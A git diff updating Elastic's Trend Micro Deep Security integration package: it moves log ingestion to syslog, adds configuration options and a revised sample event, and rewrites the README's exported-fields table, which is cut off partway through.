interpreting syslog timestamps without a time zone, use this timezone offset. Datetimes recorded in logs are by default interpreted in relation to the timezone set up on the host where the agent is operating. + Use this parameter to adjust the timezone offset when importing logs from a host in a different timezone so that datetimes are appropriately interpreted. + Both a canonical ID (such as "Europe/Amsterdam") and an HH:mm differential (such as "-05:00") are acceptable timezone formats. - name: tags type: text title: Tags - description: A list of tags to include in events. Including `forwarded` indicates that the events did not originate on this host and causes `host.name` to not be added to events. multi: true required: true show_user: false default: - - deep-security - forwarded + - trendmicro.deep_security - name: preserve_original_event required: true show_user: true title: Preserve original event - description: Preserves a raw copy of the original event, added to the field `event.original` + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve trendmicro.deep_security fields that were copied to Elastic Common Schema (ECS) fields. type: bool multi: false default: false @@ -149,34 +240,7 @@ streams: multi: false required: false show_user: false - description: >- - Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. - - name: ssl - type: yaml - title: SSL Configuration - description: i.e. certificate_authorities, supported_protocols, verification_mode etc. - multi: false - required: false - show_user: false - default: | - #certificate_authorities: - # - | - # -----BEGIN CERTIFICATE----- - # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF - # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 - # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB - # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n - # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl - # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t - # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP - # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 - # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O - # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux - # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D - # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw - # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA - # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu - # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 - # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk - # sxSmbIUfc2SGJGCJD4I= - # -----END CERTIFICATE----- + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/trendmicro/data_stream/deep_security/sample_event.json b/packages/trendmicro/data_stream/deep_security/sample_event.json index c3202439a0d..4190ede3dd5 100644 --- a/packages/trendmicro/data_stream/deep_security/sample_event.json +++ b/packages/trendmicro/data_stream/deep_security/sample_event.json @@ -1,8 +1,8 @@ { "@timestamp": "2020-09-21T07:21:11.000Z", "agent": { - "ephemeral_id": "846f342d-d7ee-4e2c-862b-08da1c5b6631", - "id": "a4393c91-c8ae-478b-a4f1-fa6bc37aad87", + "ephemeral_id": "2ea89e49-a391-4415-a8c4-c0ad743e691b", + "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc", "name": "docker-fleet-agent", "type": "filebeat", "version": "8.11.0" @@ -16,7 +16,7 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "a4393c91-c8ae-478b-a4f1-fa6bc37aad87", + "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc", "snapshot": false, "version": "8.11.0" }, @@ -27,46 +27,56 @@ ], "code": "5000000", "dataset": "trendmicro.deep_security", - "ingested": "2023-12-08T20:46:55Z", + "ingested": "2024-03-20T09:48:02Z", + "kind": "event", + "original": "194 <86>2020-09-21T13:51:11+06:30 DeepSec Logs CEF:0|Trend Micro|Deep Security Agent|10.2.229|5000000|WebReputation|5|cn1=1 cn1Label=Host ID dvchost=hostname request=example.com msg=Blocked By Admin", "severity": 5, + "timezone": "UTC", "type": [ - "denied" + "info" ] }, "host": { - "hostname": "hostname", "id": "1" }, "input": { - "type": "filestream" + "type": "udp" }, "log": { - "file": { - "device_id": "113", - "inode": "100938580", - "path": "/tmp/service_logs/trendmicro.log" + "source": { + "address": "192.168.224.7:54066" }, - "offset": 20358, "syslog": { "priority": 86 } }, + "message": "Blocked By Admin", "observer": { "hostname": "hostname", "product": "Deep Security Agent", "vendor": "Trend Micro", "version": "10.2.229" }, + "related": { + "hosts": [ + "1" + ] + }, "tags": [ - "deep-security", - "forwarded" + "preserve_original_event", + "forwarded", + "trendmicro.deep_security" ], "trendmicro": { - "event": { - "category": "web-reputation", - "message": "Blocked By Admin", - "name": "WebReputation", - "signature_id": 5000000 + "deep_security": { + "device": { + "custom_number1": { + "label": "Host ID" + } + }, + "event_category": "web-reputation-event", + "signature_id": 5000000, + "version": "0" } }, "url": { diff --git a/packages/trendmicro/docs/README.md b/packages/trendmicro/docs/README.md index 46d7d7ced41..f3744df5c9a 100644 --- a/packages/trendmicro/docs/README.md +++ b/packages/trendmicro/docs/README.md @@ -2,15 +2,50 @@ ## Overview -Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via a log file. +Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via syslog server. ## Data Streams -This integration collects **deep_security** data streams.See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/aws/events.html). +This integration supports **deep_security** data stream. See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/20_0/on-premise/events.html). ## Requirements -Elastic Agent is required to ingest data from Deep Security log files. This integration has been tested against Deep Security v12 LTS. Please note is you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). +Elastic Agent is required to ingest data from Deep Security. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +## Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **kibana.version** required is **8.11.0**. + +This integration has been tested against Deep Security 20. Please note if you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). + +## Setup + +Follow the [setup guide](https://help.deepsecurity.trendmicro.com/20_0/on-premise/event-syslog.html) to forward deep security events to a syslog server. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Trend Micro. +3. Click on the "Trend Micro" integration from the search results. +4. Click on the "Add Trend Micro" button to add the integration. +5. Add all the required integration configuration parameters according to the enabled input type. +6. Click on "Save and Continue" to save the integration. ## Logs @@ -18,173 +53,197 @@ Elastic Agent is required to ingest data from Deep Security log files. This inte Deep Security logs collect the trendmicro deep security logs. +An example event for `deep_security` looks as following: + +```json +{ + "@timestamp": "2020-09-21T07:21:11.000Z", + "agent": { + "ephemeral_id": "2ea89e49-a391-4415-a8c4-c0ad743e691b", + "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.11.0" + }, + "data_stream": { + "dataset": "trendmicro.deep_security", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc", + "snapshot": false, + "version": "8.11.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "network" + ], + "code": "5000000", + "dataset": "trendmicro.deep_security", + "ingested": "2024-03-20T09:48:02Z", + "kind": "event", + "original": "194 <86>2020-09-21T13:51:11+06:30 DeepSec Logs CEF:0|Trend Micro|Deep Security Agent|10.2.229|5000000|WebReputation|5|cn1=1 cn1Label=Host ID dvchost=hostname request=example.com msg=Blocked By Admin", + "severity": 5, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "id": "1" + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "192.168.224.7:54066" + }, + "syslog": { + "priority": 86 + } + }, + "message": "Blocked By Admin", + "observer": { + "hostname": "hostname", + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "10.2.229" + }, + "related": { + "hosts": [ + "1" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "trendmicro.deep_security" + ], + "trendmicro": { + "deep_security": { + "device": { + "custom_number1": { + "label": "Host ID" + } + }, + "event_category": "web-reputation-event", + "signature_id": 5000000, + "version": "0" + } + }, + "url": { + "original": "example.com" + } +} +``` + **Exported fields** | Field | Description | Type | |---|---|---| | @timestamp | Event timestamp. | date | -| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | -| cloud.availability_zone | Availability zone in which this host is running. | keyword | -| cloud.image.id | Image ID for the cloud instance. | keyword | -| cloud.instance.id | Instance ID of the host machine. | keyword | -| cloud.instance.name | Instance name of the host machine. | keyword | -| cloud.machine.type | Machine type of the host machine. | keyword | -| cloud.project.id | Name of the project in Google Cloud. | keyword | -| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | -| cloud.region | Region in which this host is running. | keyword | -| container.id | Unique container id. | keyword | -| container.image.name | Name of the image the container was built on. | keyword | -| container.labels | Image labels. | object | -| container.name | Container name. | keyword | | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | -| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | -| destination.as.organization.name | Organization name. | keyword | -| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text | -| destination.bytes | Bytes sent from the destination to the source. | long | -| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | -| destination.geo.city_name | City name. | keyword | -| destination.geo.continent_name | Name of the continent. | keyword | -| destination.geo.country_iso_code | Country ISO code. | keyword | -| destination.geo.country_name | Country name. | keyword | -| destination.geo.location | Longitude and latitude. | geo_point | -| destination.geo.region_iso_code | Region ISO code. | keyword | -| destination.geo.region_name | Region name. | keyword | -| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | -| destination.nat.ip | Translated ip of destination based NAT sessions (e.g. internet to private DMZ) Typically used with load balancers, firewalls, or routers. | ip | -| destination.nat.port | Port the source session is translated to by NAT Device. Typically used with load balancers, firewalls, or routers. | long | -| destination.port | Port of the destination. | long | -| destination.user.group.id | Unique identifier for the group on the system/platform. | keyword | -| destination.user.group.name | Name of the group. | keyword | -| destination.user.id | Unique identifier of the user. | keyword | -| destination.user.name | Short name or login of the user. | keyword | -| destination.user.name.text | Multi-field of `destination.user.name`. | match_only_text | -| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | -| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | -| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | -| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | -| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long | -| event.id | Unique ID to describe the event. | keyword | -| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | -| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | -| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | -| event.risk_score | Risk score or priority of the event (e.g. security solutions). Use your system's original value here. | float | -| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | -| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | -| file.group | Primary group name of the file. | keyword | -| file.hash.md5 | MD5 hash. | keyword | -| file.hash.sha1 | SHA1 hash. | keyword | -| file.hash.sha256 | SHA256 hash. | keyword | -| file.inode | Inode representing the file in the filesystem. | keyword | -| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | -| file.path.text | Multi-field of `file.path`. | match_only_text | -| file.size | File size in bytes. Only relevant when `file.type` is "file". | long | -| file.type | File type (file, dir, or symlink). | keyword | -| host.architecture | Operating system architecture. | keyword | -| host.containerized | If the host is a container. | boolean | -| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | -| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | -| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | -| host.ip | Host ip addresses. | ip | -| host.mac | Host mac addresses. | keyword | -| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | -| host.os.build | OS build information. | keyword | -| host.os.codename | OS codename, if any. | keyword | -| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | -| host.os.kernel | Operating system kernel version as a raw string. | keyword | -| host.os.name | Operating system name, without the version. | keyword | -| host.os.name.text | Multi-field of `host.os.name`. | text | -| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | -| host.os.version | Operating system version as a raw string. | keyword | -| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | -| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | -| http.request.referrer | Referrer for this HTTP request. | keyword | -| input.type | Input type | keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | | log.file.device_id | ID of the device containing the filesystem where the file resides. | keyword | | log.file.fingerprint | The sha256 fingerprint identity of the file when fingerprinting is enabled. | keyword | | log.file.idxhi | The high-order part of a unique identifier that is associated with a file. (Windows-only) | keyword | | log.file.idxlo | The low-order part of a unique identifier that is associated with a file. (Windows-only) | keyword | | log.file.inode | Inode number of the log file. | keyword | -| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | | log.file.vol | The serial number of the volume that contains a file. (Windows-only) | keyword | -| log.offset | Log offset | long | +| log.offset | Log offset. | long | | log.source.address | Source address from which the log event was read / sent from. | keyword | -| log.syslog.priority | Syslog numeric priority of the event, if available. According to RFCs 5424 and 3164, the priority is 8 \* facility + severity. This number is therefore expected to contain a value between 0 and 191. | long | -| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | -| network.application | When a specific application or service is identified from network connection details (source/dest IPs, ports, certificates, or wire format), this field captures the application's or service's name. For example, the original event identifies the network connection being from a specific web service in a `https` network connection, like `facebook` or `twitter`. The field value must be normalized to lowercase for querying. | keyword | -| network.community_id | A hash of source and destination IPs and ports, as well as the protocol used in a communication. This is a tool-agnostic standard to identify flows. Learn more at https://github.com/corelight/community-id-spec. | keyword | -| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | -| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | -| observer.egress.zone | Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. | keyword | -| observer.hostname | Hostname of the observer. | keyword | -| observer.ingress.interface.name | Interface name as reported by the system. | keyword | -| observer.ingress.zone | Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. | keyword | -| observer.ip | IP addresses of the observer. | ip | -| observer.product | The product name of the observer. | keyword | -| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword | -| observer.vendor | Vendor name of the observer. | keyword | -| observer.version | Observer version. | keyword | -| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | -| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | -| related.ip | All of the IPs seen on your event. | ip | -| related.user | All the user names or other user identifiers seen on the event. | keyword | -| rule.category | A categorization value keyword used by the entity using the rule for detection of this event. | keyword | -| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | -| rule.uuid | A rule ID that is unique within the scope of a set or group of agents, observers, or other entities using the rule for detection of this event. | keyword | -| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | -| source.as.organization.name | Organization name. | keyword | -| source.as.organization.name.text | Multi-field of `source.as.organization.name`. | match_only_text | -| source.bytes | Bytes sent from the source to the destination. | long | -| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | -| source.geo.city_name | City name. | keyword | -| source.geo.continent_name | Name of the continent. | keyword | -| source.geo.country_iso_code | Country ISO code. | keyword | -| source.geo.country_name | Country name. | keyword | -| source.geo.location | Longitude and latitude. | geo_point | -| source.geo.region_iso_code | Region ISO code. | keyword | -| source.geo.region_name | Region name. | keyword | -| source.ip | IP address of the source (IPv4 or IPv6). | ip | -| source.nat.ip | Translated ip of source based NAT sessions (e.g. internal client to internet) Typically connections traversing load balancers, firewalls, or routers. | ip | -| source.nat.port | Translated port of source based NAT sessions. (e.g. internal client to internet) Typically used with load balancers, firewalls, or routers. | long | -| source.port | Port of the source. | long | -| source.user.group.id | Unique identifier for the group on the system/platform. | keyword | -| source.user.group.name | Name of the group. | keyword | -| source.user.id | Unique identifier of the user. | keyword | -| source.user.name | Short name or login of the user. | keyword | -| source.user.name.text | Multi-field of `source.user.name`. | match_only_text | -| tags | List of keywords used to tag each event. | keyword | -| trendmicro.event.action_reason | The reason why application control performed the specified action, such as "notWhitelisted" (the software did not have a matching rule, and application control was configured to block unrecognized software). | keyword | -| trendmicro.event.aggregation_type | An integer that indicates how the event is aggregated. | keyword | -| trendmicro.event.category | proper categorization of some events. | keyword | -| trendmicro.event.count | The number of occurrences of the event. | keyword | -| trendmicro.event.ethernet_frame_type | Connection ethernet frame type. | keyword | -| trendmicro.event.ips_flag | A combined value that includes the sum of the flag values. | keyword | -| trendmicro.event.ips_packet_position | Position within packet of data that triggered the event. | keyword | -| trendmicro.event.ips_stream_position | Position within stream of data that triggered the event. | keyword | -| trendmicro.event.log_inspection_description | The Log Inspection sub-rule which triggered this event. | keyword | -| trendmicro.event.malware_target | The file, process, or registry key (if any) that the malware was trying to affect. If the malware was trying to affect more than one, this field will contain the value "Multiple." | keyword | -| trendmicro.event.malware_target_type | The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. | keyword | -| trendmicro.event.message | The event short message. | keyword | -| trendmicro.event.name | Name of the event type. | keyword | -| trendmicro.event.old_file_path | The previous integrity rule target entity to capture the rename action from the previous target entity to the new, which is recorded in the filePath field. | keyword | -| trendmicro.event.packet_data | The packet data, represented in Base64. | keyword | -| trendmicro.event.packet_fragmentation | Packet Fragmentation Information. | keyword | -| trendmicro.event.probable_threat_type | Probable Threat Type.Indicates the most likely type of threat contained in the file after Predictive Machine Learning compared the analysis to other known threats(separate by semicolon";" ). | keyword | -| trendmicro.event.signature_id | The "Signature ID" value indicates what kind of event has been triggered. | integer | -| trendmicro.event.spyware_resourcetype | Resource Type values.For example, if there's a spyware file named spy.exe that creates a registry run key to keep its persistence after system reboot, there will be two items in the spyware report; the item for spy.exe has Files and Directories, and the item for the run key registry has System Registry. | keyword | -| trendmicro.event.spyware_risklevel | Risk level values. | keyword | -| trendmicro.event.tags | Deep Security event tags assigned to the event. | keyword | -| trendmicro.event.target | The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. | keyword | -| trendmicro.event.target_id | The identifier added in the manager. | keyword | -| trendmicro.event.target_type | The event target entity type. | keyword | -| trendmicro.event.tcp_flag | TCP Flag. | keyword | -| trendmicro.event.tenant_id | Deep Security tenant ID. | keyword | -| trendmicro.event.tenant_name | Deep Security tenant name. | keyword | -| trendmicro.event.threat_probability | Indicates how closely (in %) the file matched the malware model. | keyword | -| trendmicro.event.threat_type | The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. | keyword | -| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | -| url.original.text | Multi-field of `url.original`. | match_only_text | -| user_agent.original | Unparsed user_agent string. | keyword | -| user_agent.original.text | Multi-field of `user_agent.original`. | match_only_text | +| source.process.name | Source process name. | keyword | +| tags | User defined tags. | keyword | +| trendmicro.deep_security.action | The action detected by the integrity rule. | keyword | +| trendmicro.deep_security.aggregation_type | An integer that indicates how the event is aggregated:. | keyword | +| trendmicro.deep_security.base_event_count | Base event count. | long | +| trendmicro.deep_security.bytes_in | Number of inbound bytes read. | long | +| trendmicro.deep_security.computer_name | The computer name. | keyword | +| trendmicro.deep_security.destination.address | IP address of the destination computer. | ip | +| trendmicro.deep_security.destination.mac_address | Destination MAC Address. | keyword | +| trendmicro.deep_security.destination.port | Port number of the destination computer's connection or session. | long | +| trendmicro.deep_security.destination.user_name | Destination user name. | keyword | +| trendmicro.deep_security.device.custom_number1.label | The name label for the field cn1. | keyword | +| trendmicro.deep_security.device.custom_number1.value | The value for the field cn1. | keyword | +| trendmicro.deep_security.device.custom_number2.label | The name label for the field cn2. | keyword | +| trendmicro.deep_security.device.custom_number2.value | The value for the field cn2. | long | +| trendmicro.deep_security.device.custom_number3.label | The name label for the field cn3. | keyword | +| trendmicro.deep_security.device.custom_number3.value | The value for the field cn3. | long | +| trendmicro.deep_security.device.custom_string1.label | The name label for the field cs1. | keyword | +| trendmicro.deep_security.device.custom_string1.value | The value for the field cs1. | keyword | +| trendmicro.deep_security.device.custom_string2.label | The name label for the field cs2. | keyword | +| trendmicro.deep_security.device.custom_string2.value | The value for the field cs2. | keyword | +| trendmicro.deep_security.device.custom_string3.label | The name label for the field cs3. | keyword | +| trendmicro.deep_security.device.custom_string3.value | The value for the field cs3. | keyword | +| trendmicro.deep_security.device.custom_string4.label | The name label for the field cs4. | keyword | +| trendmicro.deep_security.device.custom_string4.value | The value for the field cs4. | keyword | +| trendmicro.deep_security.device.custom_string5.label | The name label for the field cs5. | keyword | +| trendmicro.deep_security.device.custom_string5.value | The value for the field cs5. | keyword | +| trendmicro.deep_security.device.custom_string6.label | The name label for the field cs6. | keyword | +| trendmicro.deep_security.device.custom_string6.value | The value for the field cs6. | keyword | +| trendmicro.deep_security.device.custom_string7.label | The name label for the field cs7. | keyword | +| trendmicro.deep_security.device.custom_string7.value | The value for the field cs7. | keyword | +| trendmicro.deep_security.device.product | Product name. | keyword | +| trendmicro.deep_security.device.vendor | Vendor name. | keyword | +| trendmicro.deep_security.device.version | Product version. | keyword | +| trendmicro.deep_security.deviceHostName | The hostname for cn1. | keyword | +| trendmicro.deep_security.domain_name | The domain name. | keyword | +| trendmicro.deep_security.event_category | Event category of deep security event. | keyword | +| trendmicro.deep_security.event_class_id | Event Class ID. | keyword | +| trendmicro.deep_security.file.hash | The SHA 256 hash that identifies the software file. | keyword | +| trendmicro.deep_security.file.size | The file size in bytes. | long | +| trendmicro.deep_security.file_path | The location of the malware file. | keyword | +| trendmicro.deep_security.filename | The file name that was accessed. | keyword | +| trendmicro.deep_security.message | A list of changed attribute names. | keyword | +| trendmicro.deep_security.model | The product name of the device. | keyword | +| trendmicro.deep_security.name | CEF event containing message. | keyword | +| trendmicro.deep_security.permission | The block reason of the access. | keyword | +| trendmicro.deep_security.process.name | The process name. | keyword | +| trendmicro.deep_security.repeat_count | The number of occurrences of the event. | keyword | +| trendmicro.deep_security.request_url | The URL of the request. | keyword | +| trendmicro.deep_security.result | The result of the failed Anti-Malware action. | keyword | +| trendmicro.deep_security.serial | The serial number of the device. | keyword | +| trendmicro.deep_security.severity | Severity of the Event. | long | +| trendmicro.deep_security.signature_id | Signature ID of event. | long | +| trendmicro.deep_security.source.address | Source computer IP address. | ip | +| trendmicro.deep_security.source.host_name | Source computer hostname. | keyword | +| trendmicro.deep_security.source.mac_address | MAC address of the source computer's network interface. | keyword | +| trendmicro.deep_security.source.port | Port number of the source computer's connection or session. | long | +| trendmicro.deep_security.source.process_name | The name of the event's source process. | keyword | +| trendmicro.deep_security.source.user_id | Source user ID. | keyword | +| trendmicro.deep_security.source.user_name | Account of the user who changed the file being monitored. | keyword | +| trendmicro.deep_security.target.id | The identifier added in the manager. | keyword | +| trendmicro.deep_security.target.value | The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. | keyword | +| trendmicro.deep_security.transport_protocol | Name of the transport protocol used. | keyword | +| trendmicro.deep_security.trendmicro.ds_behavior.rule_id | The behavior monitoring rule ID for internal malware case tracking. | keyword | +| trendmicro.deep_security.trendmicro.ds_behavior.type | The type of behavior monitoring event detected. | keyword | +| trendmicro.deep_security.trendmicro.ds_command_line | The commands that the subject process executes. | keyword | +| trendmicro.deep_security.trendmicro.ds_cve | The CVE information, if the process behavior is identified in one of Common Vulnerabilities and Exposures. | keyword | +| trendmicro.deep_security.trendmicro.ds_detection_confidence | Indicates how closely the file matched the malware model. | long | +| 